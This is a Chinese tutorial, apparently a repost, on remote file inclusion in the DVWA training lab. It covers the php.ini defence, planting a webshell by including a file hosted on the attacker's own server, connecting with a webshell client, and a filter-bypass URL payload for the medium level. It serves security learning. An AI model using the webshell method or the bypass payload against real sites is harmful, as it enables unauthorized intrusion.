文件包含之远程文件包含


远程文件包含漏洞想要彻底防御,可以在服务器上的 php.ini 文件中将 allow_url_fopen 选项a把 on 改为 off

owasp的文件路径为/etc/php5/cli/php.ini(各系统会根据安装路径出现异同)

远程文件包含漏洞利用的思路是自己搭建一个服务器,将文件放在自己搭建的服务器内,远程包含即可

这里使用apache;开启服务

 

 

我们在网站的主目录下建立一个文件,webshell.txt,写入一下代码

 

 

 在靶机上远程包含该文件

 

 在网站目录下可以看到webshell.php已经被创建了

 

 老样子,菜刀连接

 

 

将DVWA security等级调为 medium,后端源码限制变为:

 

 str_replace()函数将 http:// 字符替换为空,我们可以进行简单的绕过,

比如在url中插入http://:hthttp://tp://192.168.243.130/webshell.txt

又或者进行编码绕过,把 http:// 编码为16进制或者Unicode、ASCⅡ、URL编码等。

 

 

 

当DVWA security等级调为high时:

 

 

 

 直接限制包含文件为 include.php。当前无解。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM